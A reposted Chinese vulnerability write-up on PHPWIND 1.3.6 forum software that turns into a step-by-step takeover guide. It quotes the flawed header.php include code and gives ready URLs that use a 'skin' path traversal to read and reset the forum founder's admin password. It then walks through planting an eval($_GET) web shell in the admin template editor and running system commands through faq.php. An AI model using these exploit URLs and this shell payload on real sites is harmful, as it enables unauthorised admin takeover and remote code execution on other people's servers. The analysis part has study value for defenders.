也想出现在这里? 联系我们

PHPWIND1.3.6论坛漏洞分析

作者 : 小编 本文共2910个字,预计阅读时间需要8分钟 发布时间: 2021-06-20 共838人阅读
也想出现在这里? 联系我们

  PHPWIND 论坛是一款流行的PHP 论坛,界面美观,功能也比较强大。但大家仔细看一下会发现不论是从界面功能还是代码风格,它和 DISCUZ 都非常相似,具体原因我想也就不用说了,毕竟 DISCUZ 出来比它要早很多。但安全上它没有继承 DISCUZ 的优点, DISCUZ 论坛安全性非常好,而且商家也对此非常重视安全问题,国内论坛中不论从功能还是安全 , 第一非DISCUZ 莫属。PHPWIND 虽然代码严谨,逻辑清楚,但还是有一些漏洞,而且还相当严重。

  一 skin 变量未过滤导致管理员密码更改

  废话少说,我们来分析漏洞。漏洞代码如下 (header.php) :

  !function_exists(\’readover\’) && exit(\’Forbidden\’);

  if (!$skin) $skin=$db_defaultstyle;

  if(file_exists(R_P."data/style/$skin.php")){

  include_once(R_P."data/style/$skin.php");

  }else{

  include_once(R_P."data/style/wind.php");

  }

  $yeyestyle==\’no\’ ? $i_table="bgcolor=$tablecolor" : $i_table=\’class=i_table\’;

  if($groupid==\’guest\’ && $db_regpopup==\’1\’){

  $head_pop=\’head_pop\’;

  } else{

  $head_gotmsg=$winddb[\’newpm\’]==1 ? \’ 您有新消息 \’:\’ 短消息 \’;

  }

  require_once(PrintEot(\’css\’));

  require_once(PrintEot(\’header\’));

  ?>

  其中 $skin 变量是我们提交的,在运行到这里之前,只有一个地方处理过 $skin 变量:

  $_COOKIE[\’skinco\’] && empty($skin) && $skin=$_COOKIE[\’skinco\’];

  语句判断 COOKIE 中是否已经包含 skinco 的信息,如果有了,就取得 COOKIE 中的值,这是处理个人页面风格用的。但如果我们的 COOKIE 中没有这个值 , 那么我们提交的 skin 变量就会一点不变的传到上面的漏洞代码。有人问,如果系统关了 register_globals 会怎么样,关了也没关系。

  if(!ini_get(\’register_globals\’) || !get_magic_quotes_gpc()){

  @extract($_POST,EXTR_SKIP);

  @extract($_GET,EXTR_SKIP);

  @extract($_COOKIE,EXTR_SKIP);

  @extract($_FILES,EXTR_SKIP);

  }

  系统在 global.php 中又给释放了。所以我们不管是用 GET 方法或者 POST 方法都可以把构造好的 SKIN 变量传给程序。那传给程序有什么用呢?这是重点!

  我们看这段代码:

  if(file_exists(R_P."data/style/$skin.php")){

  include_once(R_P."data/style/$skin.php");

  }…

  含义是如果( R_P.”data/style/$skin.php” )文件存在就把它包含进来,我也不分析有几种用法了,我直接给出我最简单危害最大的利用方法。

  我们把 skin 的值设为 ”../../admin/manager” ,那就变成了 R_P.”data/style/../../admin/manager.php”, 很显然,这是论坛管理用户的一个程序,存在而且可执行。这个程序是专门用来修改 sql_config.php 的,这里面都是重要数据,包括论坛创始人的用户名和密码。我们只要构造好就可以改它的密码,直接登陆后台管理。在改之前我们可以先查看创始人的用户名。

  我给出查看的方法,大家可以比对论坛程序自己分析一下,我就不在赘述了。

  http://localhost/phpwind/faq.php?skin=../../admin/manager&tplpath=admin

  上面是我机子上的截图,其中 tplpath 变量非常重要,必须是 admin ,它是一个 template 路径,参数不对就不会显示了。

  好我们看了知道了用户名,就可以改它的密码了。

  http://localhost/phpwind/faq.php?skin=../../admin/manager&username=admin&password=xiaohua&check_pwd=xiaohua&action=go

  上面的几个参数的含义大家一看就明白,那个 username 必须添上面看到的用户名,密码自己设,至于为什么要按上面的方法构造,其实很简单 manager.php 需要哪些变量我们就提交哪些变量,不需要的我们不管。上面的变量是它所需要的,所以我们就提交这些变量,注意上面的 action 必须有值。提交后系统什么都不显示,没关系,我们再用第一次的方法就会发现两次密码不一样,证明我们改成功了。如图 2 所示:

  密码改了,我们就可以从管理页面登陆了。

  http://localhost/phpwind/admin.php

  二 后台利用 上传 SHELL

  本来改了管理员密码已经能控制论坛了,但我我觉得不传 SHELL 总觉得事情只做了一半。如何上传 SHELL ,这就要用到后台的功能了。 PHPWIND 不知是想给管理员非常大的权限还是认为没有人有能力进入后台,后台的权利真是大的惊人。其实我们不靠上面的方法,用跨站手段得到管理员密码也不难,不知写论坛的人是怎么想的。

  好,我就随便拣一处危害比较大的地方给大家分析一下,分析一下风格模板设置那个地方。

  点一下左边的连接,右边会显示 /template/wind/css.htm 。

  系统提供的功能简化理解就是可以任意编辑这个 CSS 文件,为论坛的界面做个性化设置,而且论坛运行的时候会 include 这个 css 文件,虽然它的扩展名是 .htm ,但是照样会和其他 PHP 文件一样运行。如果我们能象这个 css.htm 文件写一些 PHP 代码,就相当于我们写一个 SHELL ,是不是很简单。篇幅有限,我直接给出利用方法。把那个右边的 textarea 里面的换成下面的,然后点提交就行了。

  eval($_GET[myphpcode]);

  ?>

  大家最好按上面的构造,当然也可以自己构造,不过上面的方法我做过实验,成功率很高。

  保存之后,用下面的方法就可以利用了。

  http://localhost/phpwind/faq.php?myphpcode=echo%20system(dir);exit ;

  可以运行其它PHP语句,在此不在赘述。

  (本文由责任编辑 pasu 整理发布)

1. 本站所提供的源码模板(主题/插件)等资源仅供学习交流,若使用商业用途,请购买正版授权,否则产生的一切后果将由下载用户自行承担,有部分资源为网上收集或仿制而来,若模板侵犯了您的合法权益,请来信通知我们(Email: rayer@88.com),我们会及时删除,给您带来的不便,我们深表歉意!
2. 分享目的仅供大家学习和交流,请不要用于商业用途!
3. 如果你也有好源码或者教程,可以到用户中心发布投稿,分享有金币奖励和额外收入!
4. 本站提供的源码、模板、插件等等其他资源,都不包含技术服务 请大家谅解!
5. 如有链接无法下载、失效或广告,请联系站长,可领回失去的金币,并额外有奖!
6. 如遇到加密压缩包,默认解压密码为"www.zyfx8.cn",如遇到无法解压的请联系管理员!
本站部分文章、资源来自互联网,版权归原作者及网站所有,如果侵犯了您的权利,请及时联系我站删除。免责声明
资源分享吧 » PHPWIND1.3.6论坛漏洞分析

常见问题FAQ

免费下载或者VIP会员专享资源能否直接商用?
本站所有资源版权均属于原作者所有,这里所提供资源均只能用于参考学习用,请勿直接商用。若由于商用引起版权纠纷,一切责任均由使用者承担。更多说明请参考 VIP介绍。
织梦模板使用说明
你下载的织梦模板并不包括DedeCMS使用授权,根据DedeCMS授权协议,除个人非盈利站点外,均需购买DedeCMS商业使用授权。购买地址: http://www.desdev.cn/service-dedecms.html

发表评论

Copyright 2015-2020 版权所有 资源分享吧 Rights Reserved. 蜀ICP备14022927号-1
开通VIP 享更多特权,建议使用QQ登录